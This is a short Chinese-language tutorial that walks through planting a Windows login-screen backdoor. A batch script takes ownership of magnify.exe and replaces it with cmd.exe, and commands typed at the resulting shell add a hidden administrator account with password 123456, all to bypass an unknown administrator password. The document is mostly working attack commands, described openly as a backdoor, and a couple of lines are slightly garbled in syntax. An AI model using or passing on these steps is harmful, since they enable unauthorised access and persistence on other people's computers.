- 打开记事本,输入如下文本:
cd c:\windows\system32 takeown /f magnify.exe icacls magnify.exe /grant administrators:F ren magnify_back.exe copy cmd.exe magnify.exe
- 写完后保存为back.bat,存在C盘test目录下。
- 接下来,打开“我的电脑”,进入C盘刚建的test目录,鼠标右击刚才创建的back文件,选择以管理员身份运行,操作系统会弹出如下对话框,直接选是。
- 接下来屏幕会闪烁一下,你没看错,后门已经搞好了。
- 重启电脑,选择放大镜进入CMD命令框。
- 弹出cmd对话框,依次输入如下命令。
net user abc 123456 /add net localgroup administrators /add abc
5.系统出现了一个abc用户,密码就是我们刚才设置的123456,以abc登录系统,你就绕过了不知道原来管理员账户密码无法登录的限制。